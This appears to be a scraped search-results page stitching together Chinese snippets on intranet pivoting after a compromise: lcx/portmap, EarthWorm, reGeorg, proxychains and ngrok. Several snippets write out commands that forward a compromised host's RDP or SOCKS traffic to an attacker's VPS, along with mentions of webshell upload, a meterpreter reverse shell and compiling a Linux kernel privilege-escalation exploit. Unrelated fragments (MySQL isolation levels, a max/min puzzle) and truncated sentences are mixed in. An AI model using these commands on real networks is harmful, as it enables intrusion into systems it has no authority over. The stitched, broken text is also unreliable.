lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。...所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的网络出口做端口映射,这就体现lcx的作用了。...lcx实现端口转发,将肉鸡A上的某个端口(常用的3389),转发到具有公网地址的主机B上,这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。...使用 攻击者ip:192.168.1.2 受害者ip:192.168.1.3 将lcx.exe上传到受害者主机上,执行: lcx.exe -slave 192.168.1.2 8080 192.168.1.3...3389 然后攻击者主机上执行: lcx.exe -listen 8080 9999 这样就将受害者主机的3389服务转发到攻击者本地的9999端口上了。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ....公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 收到会话,随后使用xshell链接 ? ? ?
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。...[+] Waiting for Client on port:51 …… 然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 222.221.221.22...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave...–listen 10000 10001 例如:Lcx.exe –listen 10001 10000 意思是监听公网 ip 机器上的 10001 端口请求,并将 10001 的请求传送给 10000
工具: lcx.exe: 有一个弊端只能windows公网服务器可以使用。...lcx.exe 实例演示: 环境: 目标服务器 Windows Sever2003 内网IP :192.168.181.141 无外网IP ...我们有一个外网IP:10.22.124.132 在目标机器上执行lcx.exe -slave 10.22.124.132 6666 127.0.0.1 3389 意思是把目标机器的 3389
工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。...EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。...其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。...如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。...注意Socks协议只能下到网络层,ICMP属于链路层无法代理。 因此proxychains ping命令不能正常工作。 ? 验证内网WIN主机是否开启防火墙, ?
这个事情要回溯到曾经背八股文的时候了,想必大家在背八股文的时候对于事务隔离级别都已经背得滚瓜烂熟了,一般在说隔离级别的时候,都顺带会提到mysql的innodb...
的场景) LCX实现本地端口转发(Linux的场景) LCX实现SSH到内网主机(公网服务器是Windows) LCX实现SSH到内网主机(公网服务器是Linux) LCX实现3389到内网主机(公网服务器是...Lcx有它的局限性,比如原始版本不支持linux,不免杀等等,但lcx在某些特定的场合依然发挥着重要的作用。同样基于Socket协议。...LCX实现本地端口转发(Linux的场景) 我们现在拿到了一台主机的账号、密码和权限,现在想远程SSH连接该主机,该主机的22端口只对内开放,不对外开放。所以,我们可以利用lcx进行本地端口的转发。...ssh连接到公网服务器的2222端口即可 LCX实现SSH到内网主机(公网服务器是Linux) 首先,在VPS上进行下面操作。...我们现在想SSH到内网Linux主机。 于是,我们还可以利用lcx来进行3389端口的转发。
工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,更多平台的支持还在维护中,敬请期待。...该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。 1. 正向 SOCKS v5 服务器 $ ..../ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ ..../ew -s lcx_listen -l 9999 -e 7777 $ .
Part.0 目录 一、端口转发类 1.Lcx 本地端口转发 正向端口转发 反向端口转发 Linux版lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1...Linux版lcx Linux版本的lcx叫做portmap 先将对应的c文件上传至linux服务器中: ? 通过gcc进行编译后即可使用: gcc portmap.c -o lcx ?.../lcx -m l -p1 8888 -h2 192.168.3.140 -p2 3389 ? 尝试连接linux的8888端口: ? 成功连接至window的3389端口: ?...reGeorg+proxychains 攻击机如果为linux环境,则使用proxychains进行代理。第一步依然是将webshell上传至目标服务器: ?...该工具共有6种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran) 静态端口转发功能和lcx类似,下面来讲讲socks代理功能。
1.a和b的最大值,a和c的最大值以及b和c的最大值,三者中的最大即为最大。 2.a和b的最小值,a和c的最大值以及b和c的最小值,三者中的最小即为最小。 ...
效果如下 至此已经拿到了目标机器cmd权限 ngrok结合lcx使用转发3389端口 目标机器: lcx -slave server.ngrok.cc 33388 127.0.0.1...3389 本地指定监听: lcx -listen 9991 33389 然后连接我们本地的33389端口: 结合msf反弹meterpreter shell 首先本地开启...该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran) 这里介绍一下反弹socks5端口转发 公网Linux上:.../ew_for_linux64 -s rcsocks -l 1080 -e 8888 目标机器上: ew_for_Win.exe -s rssocks -d 公网ip -e 8888
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...、lcx_tran) -l 本地要监听的端口 -f 要主动连接的ip -g 要主动连接的端口 -d 要反弹到的ip -e 要反弹到的端口 -s 工作模式 工作模式支持如下: lcx_tran 正向tcp...端口转发,监听在本地 lcx_slave 反向tcp转发客户端 lcx_listen 反向tcp服务端 ssocksd 创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去 rssocks.../ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ .
0×03 socket端口转发 首先我们介绍下最为经典也是使用最为频繁的端口转发工具lcx,lcx.exe 是一个基于 socket 套接字实现的端口转发工具,它是从 linux 下的htran 工具移植到...工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。...EW的使用也非常简单,该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。...这个操作分为4步,用到lcx_listen和lcx_slave命令: A. 先上传ew 到左侧公网VPS上,运行下列命令: ew –s lcx_listen –l 10800 –e 888 ?...2.LINUX下使用proxychains KALI系统已经预装好了这个工具,我们稍作配置就可以使用,打开终端,输入命令: vi /etc/proxychains.conf # 顺便补充下LINUX下Vim
Kali地址:192.168.61.130(攻击机地址) 靶机win2008: 192.168.61.134(模拟外网私人地址) 中间跳板ngrok :vipgz4.idcfengye.com 工具:lcx...windows版与linux版 一、反弹shell到本地 1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)...由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。...二、转发3389端口到本地 1.在Kali中执行lcx监听和转发命令: ....2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令: lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389 slave后跟
Ngrok客户端,支持Windows、Linux、Mac,提供python、PHP等版本。...支持Windows、Linux、MacOS、Arm-Linux。...## 二级级联测试用例 # 方式一:利用lcx_tran $ ./ew -s ssocksd -l 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 # 方式二: $ ./ew -s lcx_listen -l 1080 -e 8888 $ ..../ew -s lcx_listen -l 9999 -e 7777 $ .
将lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP 为119.90.140.191: ? 然后我们在本机执行: lcx.exe -listen 51 3388 ?...之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388,可以看到lcx中显示了转发的信息。 ?...远程连接客户端的封包会发给主机的lcx,之后会发给肉鸡的lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。 等待一会儿之后,我们成功连接了肉鸡的远程桌面: ?...Linux Exp 提权 首先根据uname -a查看内核版本,之后根据内核版本找 Exp: ? 之后我们执行以下命令来编译: gcc -pthread exp.c -o exp 然后执行....附录 米斯特白帽子培训第二期视频教程 Kali Linux 秘籍 第七章 权限提升 CVE-2016-5195 脏牛漏洞
---- 内网跨边界应用 前言 与内网渗透系列:内网穿透(隧道)学习可以互相补充 一、内网跨边界转发 1、NC端口转发 netcat瑞士军刀 参见Kali linux 学习笔记(四)基本工具熟悉——nc.../cw1997/NATBypass C版:https://github.com/windworst/LCX C++版:https://github.com/UndefinedIdentifier/LCX.../ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 lcx_listen、lcx_slave 的用法 $ ....然后远程连接转发端口即可建立socket代理隧道 对于aspx的网站假如总是报错,可以尝试ashx脚本 PHP程序确认php.ini中socket模块正常开启并且可用,reGeorge也提供了nosocket脚本 linux
第三节 lcx lcx是一款内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。这个工具很早就已经有了,现在已经有跨平台的了,支持在windows、linux下使用。...还有一些根据lcx源码开发的其他版本,比如jsp版,http隧道版等等。.../lcx - [ file] ..../lcx -tran 8080 192.168.1.5 80 这个时候,hacker只要连接到主机A的8080端口,即可访问到主机B的80端口。.../lcx -listen 8080 8081 在主机B上连接22端口,并连接主机C的8081端口: .
版HTran(lcx)的源码参考如下地址: https://github.com/windworst/LCX 需要使用gcc重新编译 (1)开启转发功能 [crayon-5bf06608e94b2523122052.../lcx -tran 8888 192.168.111.103 4444 [/crayon] 注: go语言编写的HTran(lcx),优点是跨平台,支持Windows和Linux 下载地址: https.../ew_for_linux -s lcx_tran -l 8888 -f 192.168.111.103 -g 4444 [/crayon] 4、Linux系统(CentOS)下的常用端口转发方法 Transit...Client: [crayon-5bf06608e94f1807101315 inline="true" ]ew -s lcx_listen -l 2222 -e 1111 [/crayon] Transit...server: [crayon-5bf06608e94f5334785590 inline="true" ]ew -s lcx_slave -d 1.1.1.1 -e 1111 -f 10.0.0.2
环境配置 该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。...分别是win7、server2008、kali linux 因为需要从不同的角度来进行配置ip地址,所以在这里先不固定ip地址。...LCX Lcx是一款端口转发工具,一般使用条件: 内网服务器可以出网 服务器在外网,但是服务器安装了某些防护禁止敏感端口连接,如果发生这种,可以查看哪些端口允许传输数据,用这些端口将3389端口进行转发...4.1 windows下使用 直接使用lcx.exe在两个主机上进行使用 首先在内网机winserver2008上使用端口转发 Lcx是一种一对一的端口转发,效率比较低,而且又可能会被杀软杀掉。...4.2 Linux下用 这里使用的是一台 Ubuntu 16.04 10.211.55.14 还有一台kali linux 10.211.55.23 Usage:.
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
